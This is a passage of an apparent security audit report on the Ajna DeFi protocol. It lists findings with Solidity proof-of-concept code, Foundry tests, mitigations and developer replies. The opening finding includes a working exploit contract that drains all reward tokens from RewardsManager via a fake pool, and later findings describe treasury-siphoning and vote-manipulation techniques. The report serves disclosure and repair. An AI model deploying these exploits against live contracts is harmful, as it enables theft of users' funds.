IRewardsManager rewardsManager;
uint256 _currentBurnEpoch;
uint256 toSteal;
constructor(ERC20 _ajnaToken, IRewardsManager _rewardsManager) {
ajnaToken = _ajnaToken;
rewardsManager = _rewardsManager;
function currentBurnEpoch() external view returns (uint256) {
return _currentBurnEpoch;
function bucketExchangeRate(uint) external view returns (uint256) {
return 1 ether + _currentBurnEpoch;
function burnInfo(uint256 index) external view returns (uint256 burnBlock_, uint256 totalInterest_, uint256 totalBurned_) {
if (index == 1) {
return (block.timestamp + 2 weeks, 0, 0);
} else {
return (block.timestamp + 2 weeks, 1, toSteal * 20);
function bucketInfo(uint256) external pure returns (
uint256 lpAccumulator_,
uint256 availableCollateral_,
uint256 bankruptcyTime_,
uint256 bucketDeposit_,
uint256 bucketScale_
) {
return (0, 0, 0, 1 ether, 0);
function steal() external {
toSteal = ajnaToken.balanceOf(address(rewardsManager));
uint256[] memory depositIndexes = new uint256[](1);
depositIndexes[0] = 0;
// setup the `prevBucketExchangeRate`
_currentBurnEpoch = 1;
rewardsManager.updateBucketExchangeRatesAndClaim(address(this), depositIndexes);
_currentBurnEpoch = 2;
rewardsManager.updateBucketExchangeRatesAndClaim(address(this), depositIndexes);
contract StealRewardsTest is Test {
address internal _ajna = 0x9a96ec9B57Fb64FbC60B423d1f4da7691Bd35079;
ERC20 internal _ajnaToken;
IRewardsManager internal _rewardsManager;
IPositionManager internal _positionManager;
ERC20PoolFactory internal _poolFactory;
function setUp() external {
_ajnaToken = ERC20(_ajna);
_poolFactory = new ERC20PoolFactory(_ajna);
_positionManager = new PositionManager(_poolFactory, new ERC721PoolFactory(_ajna));
_rewardsManager = new RewardsManager(_ajna, _positionManager);
deal(_ajna, address(_rewardsManager), 100_000_000 * 1e18);
assertEq(_ajnaToken.balanceOf(address(_rewardsManager)), 100_000_000 * 1e18);
function testStealRewards() external {
StealRewards stealRewards = new StealRewards(_ajnaToken, _rewardsManager);
uint rewardsManagerBalance = _ajnaToken.balanceOf(address(_rewardsManager));
emit log_named_uint("Rewards balance before", rewardsManagerBalance);
emit log_named_uint("Hacker balance before ", _ajnaToken.balanceOf(address(stealRewards)));
assertEq(_ajnaToken.balanceOf(address(stealRewards)), rewardsManagerBalance);
assertEq(_ajnaToken.balanceOf(address(_rewardsManager)), 0);
emit log_named_uint("Rewards balance after ", _ajnaToken.balanceOf(address(_rewardsManager)));
emit log_named_uint("Hacker balance after ", _ajnaToken.balanceOf(address(stealRewards)));
Tools Used
Foundry, IntelliJ
Recommended Mitigation Steps
The updateBucketExchangeRatesAndClaim
method should only be able to be called with a valid Ajna pool (see PositionManager._isAjnaPool) and potentially only allow pools from the currently staked tokens.
MikeHathaway (Ajna) confirmed via duplicate issue #207
Medium Risk Findings (14)
[M-01] It is possible to steal the unallocated part of every delegation period budget
Submitted by hyh, also found by mrpathfindr, bytes032, circlelooper, Jiamin, Juntao, and aashar
Attacker can monitor the standard proposals distribution and routinely steal each low activity period remainder by submitting a transfer to self
proposal and voting a dust amount for it.
Since the criteria for the final slate update is that any increase in total funding votes casted is enough, the attacker’s costs are negligible, while the remainder funds during some periods can be substantial enough for the attacker to setup such a monitoring. I.e. as funds are constant share of the treasury, while activity can differ drastically, a situation when there are less viable proposals then funds can routinely happen over time.
The assumption of the current logic is that such unallocated funds will be returned to the treasury, but it will not be the case as the cost of stealing such funds is close to zero.
A part of treasury funds can be stolen each period and will not be available for ecosystem funding.
Proof of Concept
Schematic POC:
- Bob monitors the end of each screening period and, whenever it is cheap enough, submits a proposal to send the remainder funds to self via proposeStandard()
- Bob votes for it with fundingVote() with the dust votes he have. Since it is low activity period there are room, and it is included to
- Bob updates the top slate with updateSlate(), repeating current top slate with his proposal added. Since other proposals cumulatively do not allocate full budget and Bob’s proposal have positive funding vote attached, it is included to the slate
This way Bob obtained the remainder funds nearly for free.
Core issue here looks to be the absence of the proposal votes threshold, which allows an attacker to claim the remained without any barrier to entry, i.e. having at hand only dust amount of governance tokens.
Even proposal with zero funding votes can be executed, it is only controlled to be non-negative:
function _validateSlate(uint24 distributionId_, uint256 endBlock, uint256 distributionPeriodFundsAvailable_, uint256[] calldata proposalIds_, uint256 numProposalsInSlate_) internal view returns (uint256 sum_) {
// check that the function is being called within the challenge period
if (block.number <= endBlock || block.number > _getChallengeStageEndBlock(endBlock)) {
revert InvalidProposalSlate();
// check that the slate has no duplicates
if (_hasDuplicates(proposalIds_)) revert InvalidProposalSlate();
uint256 gbc = distributionPeriodFundsAvailable_;
uint256 totalTokensRequested = 0;
// check each proposal in the slate is valid
for (uint i = 0; i < numProposalsInSlate_; ) {
Proposal memory proposal = _standardFundingProposals[proposalIds_[i]];
// check if Proposal is in the topTenProposals list
if (_findProposalIndex(proposalIds_[i], _topTenProposals[distributionId_]) == -1) revert InvalidProposalSlate();
// account for fundingVotesReceived possibly being negative
>> if (proposal.fundingVotesReceived < 0) revert InvalidProposalSlate();
The only criteria for state update is greater sum of the funding votes:
// check if slate of proposals is better than the existing slate, and is thus the new top slate
newTopSlate_ = currentSlateHash == 0 ||
>> (currentSlateHash!= 0 && sum > _sumProposalFundingVotes(_fundedProposalSlates[currentSlateHash]));
I.e. when the activity is low enough attacker can always maximize the totalTokensRequested
to be exactly gbc * 9 / 10
, claiming the difference to itself (i.e. the dust vote supplied proposal is to transfer unallocated part to attacker’s account in this case):
totalTokensRequested += proposal.tokensRequested;
// check if slate of proposals exceeded budget constraint ( 90% of GBC )
>> if (totalTokensRequested > (gbc * 9 / 10)) {
revert InvalidProposalSlate();
Recommended Mitigation Steps
Consider introducing the minimum accepted vote power for any proposal to be included in the final slate, as an example:
function _validateSlate(uint24 distributionId_, uint256 endBlock, uint256 distributionPeriodFundsAvailable_, uint256[] calldata proposalIds_, uint256 numProposalsInSlate_) internal view returns (uint256 sum_) {
+ // using 0.1% of the total vote power used as a minimum for any winning proposal
+ uint minFundingVotePower = _distributions[distributionId_].fundingVotePowerCast / 1000;
// check each proposal in the slate is valid
for (uint i = 0; i < numProposalsInSlate_; ) {
Proposal memory proposal = _standardFundingProposals[proposalIds_[i]];
// check if Proposal is in the topTenProposals list
if (_findProposalIndex(proposalIds_[i], _topTenProposals[distributionId_]) == -1) revert InvalidProposalSlate();
// account for fundingVotesReceived possibly being negative
- if (proposal.fundingVotesReceived < 0) revert InvalidProposalSlate();
+ if (proposal.fundingVotesReceived < 0 || Maths.wpow(SafeCast.toUint256(Maths.abs(proposal.fundingVotesReceived)), 2) < minFundingVotePower) revert InvalidProposalSlate();
[M-02] Delegate rewards system is unfair to delegates with less tokens and reduces decentralization
Submitted by 0x73696d616f, also found by 0xRobocop
Reduces decentralization significantly and discourages delegates with less token power to vote.
Proof of Concept
The current math gives delegates rewards based on the square of their votes. Thus, accounts with higher number of votes will be rewarded a bigger number of rewards, leading to less decentralization.
Add the following test to StandardFunding.t.sol
function test_POC_WhaleCanStealMostDelegateRewards() external {
// 24 tokenholders self delegate their tokens to enable voting on the proposals
_selfDelegateVoters(_token, _votersArr);
_token.transfer(_tokenHolder1, 300_000_000 * 1e18);
vm.roll(_startBlock + 150);
// start distribution period
uint24 distributionId = _grantFund.getDistributionId();
(, , , uint128 gbc, , ) = _grantFund.getDistributionPeriodInfo(distributionId);
assertEq(gbc, 15_000_000 * 1e18);
TestProposalParams[] memory testProposalParams = new TestProposalParams[](1);
testProposalParams[0] = TestProposalParams(_tokenHolder1, 8_500_000 * 1e18);
// create 7 proposals paying out tokens
TestProposal[] memory testProposals = _createNProposals(_grantFund, _token, testProposalParams);
assertEq(testProposals.length, 1);
vm.roll(_startBlock + 200);
// screening period votes
_screeningVote(_grantFund, _tokenHolder1, testProposals[0].proposalId, _getScreeningVotes(_grantFund, _tokenHolder1));
_screeningVote(_grantFund, _tokenHolder2, testProposals[0].proposalId, _getScreeningVotes(_grantFund, _tokenHolder2));
/*** Funding Stage ***/
// skip time to move from screening period to funding period
vm.roll(_startBlock + 600_000);
// check topTenProposals array is correct after screening period - only six should have advanced
GrantFund.Proposal[] memory screenedProposals = _getProposalListFromProposalIds(_grantFund, _grantFund.getTopTenProposals(distributionId));
// funding period votes for two competing slates, 1, or 2 and 3
_fundingVote(_grantFund, _tokenHolder1, screenedProposals[0].proposalId, voteYes, 350_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder2, screenedProposals[0].proposalId, voteYes, 50_000_000 * 1e18);
/*** Challenge Period ***/
uint256[] memory potentialProposalSlate = new uint256[](1);
potentialProposalSlate[0] = screenedProposals[0].proposalId;
// skip to the end of the DistributionPeriod
vm.roll(_startBlock + 650_000);
vm.expectEmit(true, true, false, true);
emit FundedSlateUpdated(distributionId, _grantFund.getSlateHash(potentialProposalSlate));
bool proposalSlateUpdated = _grantFund.updateSlate(potentialProposalSlate, distributionId);
/*** Execute Funded Proposals ***/
// skip to the end of the Distribution's challenge period
vm.roll(_startBlock + 700_000);
// execute funded proposals
_executeProposal(_grantFund, _token, testProposals[0]);
/*** Claim Delegate Rewards ***/
assertEq(_grantFund.getDelegateReward(distributionId, _tokenHolder1) / 1e18, 1_470_000);
assertEq(_grantFund.getDelegateReward(distributionId, _tokenHolder2) / 1e18, 30_000);
// _tokenHolder1 reward is approx 1_470_000/(1_470_000 + 30_000) ~ 98%
// linear distribution
// _tokenHolder1 reward is approx 350/(350 + 50) = 87.5%
In this test, _tokenHolder1
has 350/50 = 7 times more tokens and leads to getting 98% of the rewards.
Had a linear distribution been used, _tokenHolder1
would have received 87.5%, a fairer number.
In fact, it’s even better to use a quadratic voting system, being the rewards the square root of the votes. This would incentivize more delegates and increase decentralization.
Tools Used
Vscode, Foundry
Recommended Mitigation Steps
Use a linear or quadratic delegate reward system.
Note: validating the finding assuming it is a bug and distributing rewards according to the square wasn’t the intent of the dev team. Otherwise, the fact that the warden finds it “unfair” isn’t really a security issue.
[M-03] _updateBucketExchangeRateAndCalculateRewards
reward calculation accuracy loss
Submitted by kutugu
Divide first and then multiply, which has precision loss. The loss depends on the denominator, which is at most denominator - 1
Although Maths.wdiv rounded
adopted in _updateBucketExchangeRateAndCalculateRewards, reduce the loss, but theoretically interestFactor
loss is about interestEarned_ / 2
This means that the more interest are earned, the more users lose.
Proof of Concept
Modify for testing
diff --git a/ajna-core/src/RewardsManager.sol b/ajna-core/src/RewardsManager.sol
index 314b476..421940f 100644
--- a/ajna-core/src/RewardsManager.sol
+++ b/ajna-core/src/RewardsManager.sol
@@ -801,8 +801,12 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
rewards_ += Maths.wmul(UPDATE_CLAIM_REWARD, Maths.wmul(burnFactor, interestFactor));
+ emit CalculateReward(rewards_);
+ event CalculateReward(uint256);
/** @notice Utility method to transfer `Ajna` rewards to the sender
* @dev This method is used to transfer rewards to the `msg.sender` after a successful claim or update.
* @dev It is used to ensure that rewards claimers will be able to claim some portion of the remaining tokens if a claim would exceed the remaining contract balance.
Modify reward calculation
diff --git a/ajna-core/src/RewardsManager.sol b/ajna-core/src/RewardsManager.sol
index 421940f..4cdfefa 100644
--- a/ajna-core/src/RewardsManager.sol
+++ b/ajna-core/src/RewardsManager.sol
@@ -792,13 +792,15 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
(, , , uint256 bucketDeposit, ) = IPool(pool_).bucketInfo(bucketIndex_);
uint256 burnFactor = Maths.wmul(totalBurned_, bucketDeposit);
- uint256 interestFactor = interestEarned_ == 0 ? 0 : Maths.wdiv(
- Maths.WAD - Maths.wdiv(prevBucketExchangeRate, curBucketExchangeRate),
- interestEarned_
- );
// calculate rewards earned for updating bucket exchange rate
- rewards_ += Maths.wmul(UPDATE_CLAIM_REWARD, Maths.wmul(burnFactor, interestFactor));
+ rewards_ += interestEarned_ == 0 ? 0 : Maths.wmul(UPDATE_CLAIM_REWARD, Maths.wdiv(
+ Maths.wmul(
+ Maths.WAD - Maths.wdiv(prevBucketExchangeRate, curBucketExchangeRate),
+ burnFactor
+ ),
+ interestEarned_
+ ));
forge test --match-test testClaimRewardsFuzzy -vvvv
For a Fuzzing input:
indexes: 3
mintAmount: 73528480588506366763626
Divide first and multiply
emit CalculateReward(: 334143554965844407584)
Multiply first and divide
emit CalculateReward(: 334143554965846586903)
Tools Used
Recommended Mitigation Steps
As modified above, multiply first and then divide.
[M-04] Potential unfair distribution of Rewards due to MEV in updateBucketExchangeRatesAndClaim
Submitted by bytes032, also found by patitonar and troublor
This vulnerability allows malicious actors to exploit the reward system by frontrunning transactions and unfairly claiming rewards, thereby disincentivizing honest users from updating the bucket exchange rates and contributing to the system.
Proof of Concept
The updateBucketExchangeRatesAndClaim
function is publicly callable and serves two main purposes:
- Updates the exchange rate of a list of buckets.
- If eligible, the caller can claim
of the rewards accumulated to each bucket since the last burn event, if it hasn’t already been updated.
function updateBucketExchangeRatesAndClaim(
address pool_,
uint256[] calldata indexes_
) external override returns (uint256 updateReward) {
updateReward = _updateBucketExchangeRates(pool_, indexes_);
// transfer rewards to sender
So, to summarize it’s primary purpose is to incentivize people who keep the state updated. However, given the nature of the function (first come, first serve) it becomes very prone to MEV.
Consider the following scenario:
- Alice is hard-working, non-technical and constantly keeps track of when to update the buckets so she can claim a small reward. Unfortunately, she becomes notorious for getting most of the rewards from updating the bucket exchange rate.
- A malicious actor spots Alice’s recent gains and creates a bot to front run any transactions to RewardsManager’s
submitted by Alice. - The day after that, Alice again see’s theres a small reward to claim, attempts to claim it, but she gets front runned by whoever set the bot.
- Since Alice is non-technical, she cannot ever beat the bot so she is left with a broken heart and no longer able to claim rewards.
I believe the system should be made fair to everybody that wants to contribute, hence this is a vulnerability that should be taken care of to ensure the fair distribution of awards to people who care about the protocol instead of .
Recommended Mitigation Steps
I see potentially two solutions here:
- Introduce a randomized reward mechanism, such as a lottery system or a probabilistic reward distribution for people who contribute to updating buckets. This could reduce the predictability of rewards and hence the potential for MEV exploitation.
- Consider limiting the reward claim process to users who have staked in the rewards manager because they are the individuals that are directly affected if the bucket is not updated, because if its not updated for 14 days they won’t be getting rewards. Additionally, you can couple it with a rate-limitting mechanism by implementing a maximum claim per address per time period
MikeHathaway (Ajna) acknowledged
[M-05] Calculating new rewards is susceptible to precision loss due to division before multiplication
Submitted by cryptostellar5, also found by ladboy233 and Bauchibred
This issue is similar to https://github.com/ajna-finance/audits/blob/main/sherlock/Contest1.md#issue-m-7-calculating-new-rewards-is-susceptible-to-precision-loss-due-to-division-before-multiplication which is not fixed properly. Still, the final multiplication is being performed after the division.
Rewards may be lost (0) due to division before multiplication precision issues.
Proof of Concept
The RewardsManager._calculateNewRewards
function calculates the new rewards for a staker by first multiplying interestEarned_
by totalBurnedInPeriod
and then dividing by totalInterestEarnedInPeriod
and then again multiplying by REWARD_FACTOR
Since the division is being performed before the final multiplication, this can lead to precision loss.
function _calculateNewRewards(
address ajnaPool_,
uint256 interestEarned_,
uint256 nextEpoch_,
uint256 epoch_,
uint256 rewardsClaimedInEpoch_
) internal view returns (uint256 newRewards_) {
// total interest accumulated by the pool over the claim period
uint256 totalBurnedInPeriod,
// total tokens burned over the claim period
uint256 totalInterestEarnedInPeriod
) = _getPoolAccumulators(ajnaPool_, nextEpoch_, epoch_);
// calculate rewards earned
newRewards_ = totalInterestEarnedInPeriod == 0 ? 0 : Maths.wmul(
Maths.wmul(interestEarned_, totalBurnedInPeriod),
Recommended Mitigation Steps
All the multiplication should be performed in step 1 and then division at the end.
[M-06] An Optimizer Bug in PositionManager.getPositionIndexesFiltered
Submitted by sces60107
There is an optimizer bug in PositionManager.getPositionIndexesFiltered
The Yul optimizer considers all memory writes in the outermost Yul block that are never read from as unused and removes them. The bug is fixed in solidity 0.8.15. But PositionManager.sol
uses solidity 0.8.14.
Proof of Concept
There is an inline assembly block at the end of PositionManager.getPositionIndexesFiltered
. The written memory is never read from in the same assembly block. It would trigger the bug to remove the memory write.
function getPositionIndexesFiltered(
uint256 tokenId_
) external view override returns (uint256[] memory filteredIndexes_) {
// resize array
assembly { mstore(filteredIndexes_, filteredIndexesLength) }
Unfortunately, PositionManager
uses solidity 0.8.14 which would suffer from the bug.
pragma solidity 0.8.14;
Recommended Mitigation Steps
Update the solidity version to 0.8.15
[M-07] Calling StandardFunding.screeningVote
function and ExtraordinaryFunding.voteExtraordinary
function when block.number
equals respective start block and when block.number
is bigger than respective start block can result in different available votes for same voter
Submitted by rbserver, also found by deadrxsezzz and rvierdiiev
Because of if (block.number <= screeningStageEndBlock || block.number > endBlock) revert InvalidVote()
, the following StandardFunding.fundingVote
function can only execute uint128 newVotingPower = SafeCast.toUint128(_getVotesFunding(msg.sender, votingPower, voter.remainingVotingPower, screeningStageEndBlock))
when block.number
is bigger than screeningStageEndBlock
function fundingVote(
FundingVoteParams[] memory voteParams_
) external override returns (uint256 votesCast_) {
uint24 currentDistributionId = _currentDistributionId;
QuarterlyDistribution storage currentDistribution = _distributions[currentDistributionId];
QuadraticVoter storage voter = _quadraticVoters[currentDistributionId][msg.sender];
uint256 endBlock = currentDistribution.endBlock;
uint256 screeningStageEndBlock = _getScreeningStageEndBlock(endBlock);
// check that the funding stage is active
if (block.number <= screeningStageEndBlock || block.number > endBlock) revert InvalidVote();
uint128 votingPower = voter.votingPower;
// if this is the first time a voter has attempted to vote this period,
// set initial voting power and remaining voting power
if (votingPower == 0) {
// calculate the voting power available to the voting power in this funding stage
uint128 newVotingPower = SafeCast.toUint128(_getVotesFunding(msg.sender, votingPower, voter.remainingVotingPower, screeningStageEndBlock));
voter.votingPower = newVotingPower;
voter.remainingVotingPower = newVotingPower;
When the StandardFunding.fundingVote
function calls the following StandardFunding._getVotesFunding
function, screeningStageEndBlock
would be used as the voteStartBlock_
input for calling the Funding._getVotesAtSnapshotBlocks
function below. Because block.number
would always be bigger than screeningStageEndBlock
, voteStartBlock_
would always be screeningStageEndBlock
in the Funding._getVotesAtSnapshotBlocks
function. This means that the Funding._getVotesAtSnapshotBlocks
function would always return the same voting power for the same voter at any block.number
that is bigger than screeningStageEndBlock
during the funding phase.
function _getVotesFunding(
address account_,
uint256 votingPower_,
uint256 remainingVotingPower_,
uint256 screeningStageEndBlock_
) internal view returns (uint256 votes_) {
// voter has already allocated some of their budget this period
if (votingPower_ != 0) {
votes_ = remainingVotingPower_;
// voter hasn't yet called _castVote in this period
else {
votes_ = Maths.wpow(
screeningStageEndBlock_ - VOTING_POWER_SNAPSHOT_DELAY,
), 2);
function _getVotesAtSnapshotBlocks(
address account_,
uint256 snapshot_,
uint256 voteStartBlock_
) internal view returns (uint256) {
IVotes token = IVotes(ajnaTokenAddress);
// calculate the number of votes available at the snapshot block
uint256 votes1 = token.getPastVotes(account_, snapshot_);
// enable voting weight to be calculated during the voting period's start block
voteStartBlock_ = voteStartBlock_ != block.number ? voteStartBlock_ : block.number - 1;
// calculate the number of votes available at the stage's start block
uint256 votes2 = token.getPastVotes(account_, voteStartBlock_);
return Maths.min(votes2, votes1);
However, because of if (block.number < currentDistribution.startBlock || block.number > _getScreeningStageEndBlock(currentDistribution.endBlock)) revert InvalidVote()
, calling the following StandardFunding.screeningVote
function would not revert when block.number
equals the current distribution period’s start block.
function screeningVote(
ScreeningVoteParams[] memory voteParams_
) external override returns (uint256 votesCast_) {
QuarterlyDistribution memory currentDistribution = _distributions[_currentDistributionId];
// check screening stage is active
if (block.number < currentDistribution.startBlock || block.number > _getScreeningStageEndBlock(currentDistribution.endBlock)) revert InvalidVote();
uint256 numVotesCast = voteParams_.length;
for (uint256 i = 0; i < numVotesCast; ) {
Proposal storage proposal = _standardFundingProposals[voteParams_[i].proposalId];
// check that the proposal is part of the current distribution period
if (proposal.distributionId != currentDistribution.id) revert InvalidVote();
uint256 votes = voteParams_[i].votes;
// cast each successive vote
votesCast_ += votes;
_screeningVote(msg.sender, proposal, votes);
unchecked { ++i; }
When the StandardFunding.screeningVote
function calls the following StandardFunding._screeningVote
function, if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower()
is executed in which the StandardFunding._getVotesScreening
function below would use the current distribution period’s start block as the voteStartBlock_
input for calling the Funding._getVotesAtSnapshotBlocks
function. Since the Funding._getVotesAtSnapshotBlocks
function executes voteStartBlock_ = voteStartBlock_ != block.number ? voteStartBlock_ : block.number - 1
, voteStartBlock_
would be 1 block prior to the current distribution period’s start block when block.number
equals the current distribution period’s start block, and voteStartBlock_
would be the current distribution period’s start block when block.number
is bigger than the current distribution period’s start block. However, it is possible that the same voter has different available votes at 1 block prior to the current distribution period’s start block and at the current distribution period’s start block. This is unlike the StandardFunding._getVotesFunding
function that would always return the same voting power for the same voter when calling the StandardFunding.fundingVote
function during the funding phase. Since calling the StandardFunding._getVotesScreening
function when block.number
equals the current distribution period’s start block and when block.number
is bigger than the current distribution period’s start block during the screening phase can return different available votes for the same voter, this voter would call the StandardFunding.screeningVote
function at a chosen block.number
that would provide the highest votes.
This should not be allowed because _getVotesScreening(distributionId, account_)
needs to return the same number of votes across all blocks during the screening phase to make if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower()
effective in the StandardFunding._screeningVote
function. For example, a voter who has no available votes at 1 block prior to the current distribution period’s start block can mint many AJNA tokens at the current distribution period’s start block and call the StandardFunding.screeningVote
function at block.number
that is bigger than the current distribution period’s start block during the screening phase to use her or his available votes at current distribution period’s start block. For another example, a voter who has available votes at 1 block prior to the current distribution period’s start block can call the StandardFunding.screeningVote
function when block.number
equals the current distribution period’s start block and then sell all of her or his AJNA tokens at the same block.number
. Such voters’ actions are unfair to other voters who maintain the same number of available votes at 1 block prior to the current distribution period’s start block and at the current distribution period’s start block for the screening stage voting.
function _screeningVote(
address account_,
Proposal storage proposal_,
uint256 votes_
) internal {
uint24 distributionId = proposal_.distributionId;
// check that the voter has enough voting power to cast the vote
if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
function _getVotesScreening(uint24 distributionId_, address account_) internal view returns (uint256 votes_) {
uint256 startBlock = _distributions[distributionId_].startBlock;
// calculate voting weight based on the number of tokens held at the snapshot blocks of the screening stage
votes_ = _getVotesAtSnapshotBlocks(
Please note that calling the following ExtraordinaryFunding.voteExtraordinary
function when block.number
equals _extraordinaryFundingProposals[proposalId_].startBlock
also does not revert, and the ExtraordinaryFunding._getVotesExtraordinary
function below also uses _extraordinaryFundingProposals[proposalId_].startBlock
as the voteStartBlock_
input for calling the Funding._getVotesAtSnapshotBlocks
function. Hence, the same issue also applies to the ExtraordinaryFunding.voteExtraordinary
function voteExtraordinary(
uint256 proposalId_
) external override returns (uint256 votesCast_) {
// revert if msg.sender already voted on proposal
if (hasVotedExtraordinary[proposalId_][msg.sender]) revert AlreadyVoted();
ExtraordinaryFundingProposal storage proposal = _extraordinaryFundingProposals[proposalId_];
// revert if proposal is inactive
if (proposal.startBlock > block.number || proposal.endBlock < block.number || proposal.executed) {
revert ExtraordinaryFundingProposalInactive();
// check voting power at snapshot block and update proposal votes
votesCast_ = _getVotesExtraordinary(msg.sender, proposalId_);
proposal.votesReceived += SafeCast.toUint120(votesCast_);
// record that voter has voted on this extraordinary funding proposal
hasVotedExtraordinary[proposalId_][msg.sender] = true;
function _getVotesExtraordinary(address account_, uint256 proposalId_) internal view returns (uint256 votes_) {
if (proposalId_ == 0) revert ExtraordinaryFundingProposalInactive();
uint256 startBlock = _extraordinaryFundingProposals[proposalId_].startBlock;
votes_ = _getVotesAtSnapshotBlocks(
Proof of Concept
The following steps can occur for the described scenario.
- At 1 block prior to the current distribution period’s start block, Alice has no available votes at all.
- After noticing the
transaction that would end the previous distribution period and starts the current distribution period in the mempool, Alice backruns that transaction by minting a lot of AJNA tokens at the current distribution period’s start block. - When
becomes bigger than the current distribution period’s start block during the screening phase, Alice calls theStandardFunding.screeningVote
function to successfully use all of her available votes at the current distribution period’s start block for a proposal. - Alice’s actions are unfair to Bob who prepares for the screening stage voting and maintains the same number of available votes at 1 block prior to the current distribution period’s start block and at the current distribution period’s start block.
Tools Used
Recommended Mitigation Steps
https://github.com/code-423n4/2023-05-ajna/blob/main/ajna-grants/src/grants/base/StandardFunding.sol#L578 can be updated to the following code:
if (block.number <= currentDistribution.startBlock || block.number > _getScreeningStageEndBlock(currentDistribution.endBlock)) revert InvalidVote();
https://github.com/code-423n4/2023-05-ajna/blob/main/ajna-grants/src/grants/base/ExtraordinaryFunding.sol#L139-L141 can be updated to the following code:
if (proposal.startBlock >= block.number || proposal.endBlock < block.number || proposal.executed) {
revert ExtraordinaryFundingProposalInactive();
MikeHathaway (Ajna) disputed and commented:
Different voting mechanisms have different voting specifications.
@MikeHathaway - I think this issue is valid: it is not about different phases but about what happens at
voteStartBlock_ == block.number
versusvoteStartBlock_ == block.number + 1
Sorry for any confusion.
At 1 block prior to the current distribution period's start block, Alice has no available votes at all
in the POC section means that Alice has no available votes at that particular block that is 1 block prior to the current distribution period’s start block; yet, she can still have available votes at blocks before that particular block. When Alice has available votes at the block that is 33 blocks prior to the current distribution period’s start block, it is possible that she uses all of her available votes at the current distribution period’s start block for the scenario described in the POC section.
MikeHathaway (Ajna) commented:
If Alice has no voting power 1 block prior to start, than at the start block she will have no voting power if she doesn’t transfer and delegate tokens to that address. Prior voting power won’t matter, as we take the minimum of the prior snapshot and the current snapshot.
If Alice mints or receives AJNA tokens at the current distribution period’s start block, can she gain available votes at the current distribution period’s start block? If so, she can have voting power at the current distribution period’s start block while has 0 available votes at 1 block prior to the current distribution period’s start block. Please correct me if I am understanding this incorrectly.
MikeHathaway (Ajna) commented:
That is incorrect, the snapshot system requires that the balance be > 0 for the entire 33 blocks prior to the distribution period’s start. If any block is 0, their power is 0.
This can be verified with a quick unit test:
function testVotingPowerAtDistributionStart() external { // 14 tokenholders self delegate their tokens to enable voting on the proposals _selfDelegateVoters(_token, _votersArr); // roll 32 blocks forward to the block before the distribution period starts vm.roll(_startBlock + 32); // _tokenHolder1 transfers their tokens away address nonVotingAddress = makeAddr("nonVotingAddress"); changePrank(_tokenHolder1); _token.transfer(nonVotingAddress, 25_000_000 * 1e18); vm.roll(_startBlock + 33); // nonVotingAddress returns the funds one block later changePrank(nonVotingAddress); _token.transfer(_tokenHolder1, 25_000_000 * 1e18); // start distribution period _startDistributionPeriod(_grantFund); // check voting power of _tokenHolder1 is 0 uint256 votingPower = _getScreeningVotes(_grantFund, _tokenHolder1); assertEq(votingPower, 0); votingPower = _getScreeningVotes(_grantFund, nonVotingAddress); assertEq(votingPower, 0); }
Thanks for your reply and unit test!
The thing is that, to vote in the current distribution period, Alice does not have to vote at the current distribution period’s start block and can vote at an eligible block after the current distribution period’s start block as stated in Step 3 of the POC section. When voting at such eligible block, Alice can utilize the available votes that she gained at the start block. To demonstrate this, I’ve made some modifications to your unit test below, which does pass. Please see
for the places of modification. For this test, at_startBlock + 33
, which is the start block,_tokenHolder1
’s voting power is 0; however, at_startBlock + 34
and_startBlock + 35
’s voting power becomes 25000000 * 1e18. The inconsistency between the voting power when voting at the start block and when voting at an eligible block after the start block is the main point of this report.function testVotingPowerAtDistributionStart() external { // 14 tokenholders self delegate their tokens to enable voting on the proposals _selfDelegateVoters(_token, _votersArr); // roll 32 blocks forward to the block before the distribution period starts vm.roll(_startBlock + 32); // _tokenHolder1 transfers their tokens away address nonVotingAddress = makeAddr("nonVotingAddress"); changePrank(_tokenHolder1); // @audit transfer _token.balanceOf(_tokenHolder1) so _tokenHolder1 does not have any AJNA at _startBlock + 32 _token.transfer(nonVotingAddress, _token.balanceOf(_tokenHolder1)); vm.roll(_startBlock + 33); // nonVotingAddress returns the funds one block later changePrank(nonVotingAddress); _token.transfer(_tokenHolder1, 25_000_000 * 1e18); // start distribution period _startDistributionPeriod(_grantFund); // check voting power of _tokenHolder1 is 0 uint256 votingPower = _getScreeningVotes(_grantFund, _tokenHolder1); assertEq(votingPower, 0); votingPower = _getScreeningVotes(_grantFund, nonVotingAddress); assertEq(votingPower, 0); // @audit at _startBlock + 34, _tokenHolder1's voting power becomes 25_000_000 * 1e18, which is not 0 vm.roll(_startBlock + 34); votingPower = _getScreeningVotes(_grantFund, _tokenHolder1); assertEq(votingPower, 25_000_000 * 1e18); // @audit at _startBlock + 35, _tokenHolder1's voting power is still 25_000_000 * 1e18, which is not 0 vm.roll(_startBlock + 35); votingPower = _getScreeningVotes(_grantFund, _tokenHolder1); assertEq(votingPower, 25_000_000 * 1e18); }
MikeHathaway (Ajna) commented:
My mistake, you are correct. This is a real issue. Thank you for the report and the extra assertions!
[M-08] The voting thresholds in Ajna’s Extraordinary Funding Mechanism can be manipulated to execute proposals below the expected threshold
Submitted by bytes032, also found by Ruhum, ktg, and 7siech
This vulnerability presents a significant risk to the Ajna treasury. A malicious actor who owns a substantial amount of tokens could manipulate the voting mechanism by burning their own tokens, thereby lowering the minimum threshold of votes required for a proposal to pass.
This tactic could allow him to siphon off substantial amounts from the treasury.
Proof of Concept
By meeting a certain quorum of non-treasury tokens, token holders may take tokens from the treasury outside of the PFM by utilizing Extraordinary Funding Mechanism (EFM).
This mechanism works by allowing up to the percentage over 50% of non-treasury tokens (the “minimum threshold”) that vote affirmatively to be removed from the treasury – the cap on this mechanism is therefore 100% minus the minimum threshold (50% in this case).
- If 51% of non-treasury tokens vote affirmatively for a proposal, up to 1% of the treasury may be withdrawn by the proposal
- If 65% of non-treasury tokens vote affirmatively for a proposal, up to 15% of the treasury may be withdrawn by the proposal
- If 50% or less of non-treasury tokens vote affirmatively for a proposal, 0% of the treasury may be withdrawn by the proposal
When submitting a proposal, the proposer must include the exact percentage of the treasury they would like to extract (“proposal threshold”), if the vote fails to reach this threshold, it will fail, and no tokens will be distributed.
Example: a. A proposer requests 10% of the treasury
- 50%+10%=60%
